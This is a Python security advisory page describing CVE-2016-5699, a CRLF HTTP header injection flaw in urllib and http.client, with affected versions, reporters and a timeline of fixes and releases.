CVE-2016-5699: HTTP header injection

HTTP header injection in urllib, urrlib2, httplib and http.client modules.

CRLF injection vulnerability in the HTTPConnection.putheader() function in urllib2 and urllib in CPython before 2.7.10 and 3.x before 3.4.4 allows remote attackers to inject arbitrary HTTP headers via CRLF sequences in a URL.

Reported again in January 2016 by Timothy D. Morgan (Blindspot Security), with a full disclosed at 2016-06-15.

  • Disclosure date: 2014-11-24 (Python issue #22928 reported)
  • Red Hat impact: Moderate

Fixed In

Vulnerable Versions

  • Python 3.3

Python issue

HTTP header injection in urrlib2/urllib/httplib/http.client (CVE-2016-5699).

  • Python issue: issue #22928
  • Creation date: 2014-11-24
  • Reporter: Guido Vranken

CVE-2016-5699

CRLF injection vulnerability in the HTTPConnection.putheader function in urllib2 and urllib in CPython (aka Python) before 2.7.10 and 3.x before 3.4.4 allows remote attackers to inject arbitrary HTTP headers via CRLF sequences in a URL.

Timeline

Timeline using the disclosure date 2014-11-24 as reference:

  • 2014-11-24: Python issue #22928 reported by Guido Vranken
  • 2015-03-12 (+108 days): commit 59bdf63
  • 2015-03-12 (+108 days): commit a112a8a
  • 2015-05-23 (+180 days): Python 2.7.10 released
  • 2015-09-09: Python 3.5.0 released
  • 2015-12-21 (+392 days): Python 3.4.4 released
  • 2016-09-02 (+648 days): CVE-2016-5699 published